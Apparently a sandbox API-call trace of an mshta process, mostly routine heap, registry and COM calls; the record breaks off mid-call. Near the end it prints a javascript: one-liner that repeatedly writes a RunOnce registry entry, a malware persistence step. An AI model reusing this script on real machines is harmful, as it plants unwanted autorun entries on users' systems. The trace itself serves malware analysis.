0x1 [0066.173] IUnknown:Release (This=0x78c42c) returned 0x2 [0066.173] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf) returned 0x78bbb0 [0066.173] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bbe0 [0066.173] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x33e794, dwReserved=0x0 | out: ppSM=0x33e794*=0x798530) returned 0x0 [0066.174] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf) returned 0x78bc28 [0066.174] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x79a678 [0066.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e944 | out: phkResult=0x33e944*=0x1b8) returned 0x0 [0066.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e948 | out: phkResult=0x33e948*=0x1c0) returned 0x0 [0066.174] RegOpenKeyExW (in: hKey=0x1c0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33e904 | out: phkResult=0x33e904*=0x0) returned 0x2 [0066.174] RegOpenKeyExW (in: hKey=0x1b8, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x33e904 | out: phkResult=0x33e904*=0x0) returned 0x2 [0066.174] RegCloseKey (hKey=0x0) returned 0x6 [0066.174] RegCloseKey (hKey=0x0) returned 0x6 [0066.174] RegCloseKey (hKey=0x1b8) returned 0x0 [0066.175] RegCloseKey (hKey=0x1c0) returned 0x0 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x79b738 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x79a6d0 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc70 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2000) returned 0x79b868 [0066.175] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x79d870 [0066.175] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79d870 | out: hHeap=0x760000) returned 1 [0066.175] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.175] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e788 | out: ppURI=0x33e788*=0x78c42c) returned 0x0 [0066.176] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e060 | out: ppv=0x33e060*=0x75028c70) returned 0x0 [0066.176] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e14c | out: ppvObject=0x33e14c*=0x75028c7c) returned 0x0 [0066.176] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.176] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e194, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e194*=0xc) returned 0x0 [0066.176] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790798 [0066.176] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.176] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790798 | out: hHeap=0x760000) returned 1 [0066.177] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.177] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e060 | out: ppv=0x33e060*=0x75028c70) returned 0x0 [0066.177] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e14c | out: ppvObject=0x33e14c*=0x75028c7c) returned 0x0 [0066.177] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.177] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1a4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e1a4*=0x0) returned 0x800c0011 [0066.177] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.177] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.178] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.178] IUnknown:Release (This=0x78c42c) returned 0x2 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2c) returned 0x77d998 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bca0 [0066.179] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5c) returned 0x79d870 [0066.179] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.179] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.179] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.179] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9e0 | out: phkResult=0x33e9e0*=0x1bc) returned 0x0 [0066.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9e4 | out: phkResult=0x33e9e4*=0x1c4) returned 0x0 [0066.180] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9a0 | out: phkResult=0x33e9a0*=0x0) returned 0x2 [0066.180] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x33e9a0 | out: phkResult=0x33e9a0*=0x0) returned 0x2 [0066.180] RegCloseKey (hKey=0x0) returned 0x6 [0066.180] RegCloseKey (hKey=0x0) returned 0x6 [0066.180] RegCloseKey (hKey=0x1bc) returned 0x0 [0066.180] RegCloseKey (hKey=0x1c4) returned 0x0 [0066.180] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bcd0 [0066.229] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7795f8 [0066.229] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x5c) returned 0x79d8d8 [0066.230] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.230] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.231] RtlInitializeConditionVariable () returned 0x79d90c [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79d940 [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79d980 [0066.231] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783770 [0066.231] IUnknown:AddRef (This=0x794ec0) returned 0x0 [0066.231] IUnknown:Release (This=0x794ec0) returned 0x1 [0066.231] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.231] IUnknown:QueryInterface (in: This=0x794ec0, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33f7ac | out: ppvObject=0x33f7ac*=0x794ec0) returned 0x0 [0066.232] IUnknown:Release (This=0x794ec0) returned 0x1 [0066.232] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d308 [0066.236] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x794f18 | out: ppvOut=0x794f18*=0x0) returned 0x80004005 [0066.236] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f728 | out: ppvObject=0x33f728*=0x750296b8) returned 0x0 [0066.237] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x794f18 | out: ppvObject=0x794f18*=0x0) returned 0x80004005 [0066.237] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x34) returned 0x79d9c0 [0066.237] IInternetSecurityManager:SetSecuritySite (This=0x796530, pSite=0x7955fc) returned 0x0 [0066.237] IUnknown:Release (This=0x7955fc) returned 0x0 [0066.237] IUnknown:AddRef (This=0x7955fc) returned 0x28 [0066.237] IUnknown:QueryInterface (in: This=0x7955fc, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33f760 | out: ppvObject=0x33f760*=0x795600) returned 0x0 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x796558 | out: ppvObject=0x796558*=0x0) returned 0x80004002 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x796554 | out: ppvObject=0x796554*=0x0) returned 0x80004002 [0066.237] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x796550 | out: ppvObject=0x796550*=0x750296bc) returned 0x0 [0066.237] IUnknown:Release (This=0x795600) returned 0x0 [0066.237] CoTaskMemAlloc (cb=0x6d) returned 0x79da00 [0066.237] CoTaskMemAlloc (cb=0x9) returned 0x78bce8 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78bd00 [0066.237] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x79da78 [0066.239] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.239] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x44) returned 0x779648 [0066.241] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79dae8 [0066.241] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db00 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4) returned 0x78c0a8 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790658 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79db18 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x94) returned 0x79ded0 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x79df70 [0066.243] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x70) returned 0x79dfb0 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf8) returned 0x79e028 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8b4) returned 0x79e128 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db30 [0066.307] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db48 [0066.307] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x84) returned 0x79e9e8 [0066.333] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79ea78 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79f280 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4c) returned 0x79fa88 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x800) returned 0x79fae0 [0066.334] IsCharSpaceW (wch=0x48) returned 0 [0066.334] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.334] IsCharSpaceW (wch=0x5c) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x783790 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a02e8 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7837b0 [0066.334] IsCharSpaceW (wch=0x41) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79db60 [0066.334] IsCharAlphaNumericW (ch=0x20) returned 0 [0066.334] IsCharSpaceW (wch=0x20) returned 1 [0066.334] IsCharSpaceW (wch=0x7b) returned 0 [0066.334] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790810 [0066.334] IsCharSpaceW (wch=0x20) returned 1 [0066.334] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.334] IsCharSpaceW (wch=0x62) returned 0 [0066.335] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a02e8 | out: hHeap=0x760000) returned 1 [0066.335] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.335] IsCharSpaceW (wch=0x3a) returned 0 [0066.335] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790838 [0066.415] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.415] IsCharSpaceW (wch=0x28) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.415] IsCharSpaceW (wch=0x23) returned 0 [0066.415] IsCharSpaceW (wch=0x23) returned 0 [0066.415] IsCharSpaceW (wch=0x7d) returned 0 [0066.415] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.415] IsCharSpaceW (wch=0x29) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharSpaceW (wch=0x75) returned 0 [0066.415] IsCharSpaceW (wch=0x29) returned 0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x7837f0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x34) returned 0x7a04f0 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x774328 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db78 [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79db90 [0066.415] CoTaskMemFree (pv=0x79da00) [0066.415] CoTaskMemFree (pv=0x78bce8) [0066.415] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x783810 [0066.415] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.416] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.416] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x340) returned 0x7a0530 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4a) returned 0x79da00 [0066.416] IsOS (dwOS=0x25) returned 1 [0066.416] GetSysColor (nIndex=26) returned 0xcc6600 [0066.416] IsOS (dwOS=0x25) returned 1 [0066.416] GetSysColor (nIndex=5) returned 0xffffff [0066.416] GetSysColor (nIndex=8) returned 0x0 [0066.416] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.416] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bce8 [0066.467] wcstol (in: _String="0,0,255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",0,255") returned 0 [0066.467] wcstol (in: _String="0,255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",255") returned 0 [0066.467] wcstol (in: _String="255", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*="") returned 255 [0066.467] wcstol (in: _String="128,0,128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",0,128") returned 128 [0066.467] wcstol (in: _String="0,128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*=",128") returned 0 [0066.467] wcstol (in: _String="128", _EndPtr=0x33e3bc, _Radix=10 | out: _EndPtr=0x33e3bc*="") returned 128 [0066.469] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.469] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.469] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x33f474 | out: phkResult=0x33f474*=0x1a4) returned 0x0 [0066.470] SHGetValueW (in: hkey=0x1a4, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x33f478, pcbData=0x33f470*=0xa | out: pdwType=0x0, pvData=0x33f478, pcbData=0x33f470*=0xa) returned 0x2 [0066.470] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x80) returned 0x7a18b8 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc88 [0066.470] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x3a) returned 0x7743b8 [0066.471] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x6a) returned 0x7a1940 [0066.524] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bcb8 [0066.524] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x26) returned 0x77d338 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x6e) returned 0x7a19b8 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a0878 | out: hHeap=0x760000) returned 1 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a08d0 | out: hHeap=0x760000) returned 1 [0066.525] GetProcessHeap () returned 0x760000 [0066.525] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78c0b8 | out: hHeap=0x760000) returned 1 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783830 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x79dbc0 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783850 [0066.525] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x774400 [0066.526] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a1a30 [0066.526] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x77d368 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790888 [0066.527] GetAcceptLanguagesW () returned 0x0 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78b970 [0066.527] GetClassNameW (in: hWnd=0x3027a, lpClassName=0x33f744, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.527] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.527] GetParent (hWnd=0x3027a) returned 0x6011a [0066.527] GetClassNameW (in: hWnd=0x6011a, lpClassName=0x33f744, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.527] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.527] GetParent (hWnd=0x6011a) returned 0x0 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x783870 [0066.527] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d398 [0066.527] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x783870 | out: hHeap=0x760000) returned 1 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a1a98 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc38 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x94) returned 0x7a1af0 [0066.586] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x783870 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12) returned 0x783890 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x14) returned 0x7838b0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc50 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dc68 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dc80 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dc98 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x7908b0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x7908d8 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1a) returned 0x790900 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7838d0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7838f0 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783910 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783930 [0066.587] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dcb0 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x79dce0 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x79dcf8 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x783950 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe) returned 0x79dd10 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa) returned 0x79dd28 [0066.588] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x26) returned 0x77d3c8 [0066.588] GetProcessHeap () returned 0x760000 [0066.588] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790928 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790950 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790978 | out: hHeap=0x760000) returned 1 [0066.589] GetProcessHeap () returned 0x760000 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b940 | out: hHeap=0x760000) returned 1 [0066.589] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79dcb0 | out: hHeap=0x760000) returned 1 [0066.589] IMoniker:GetDisplayName (in: This=0x78af40, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x33f708 | out: ppszDisplayName=0x33f708*="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 0x0 [0066.589] IUnknown:QueryInterface (in: This=0x78af40, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, 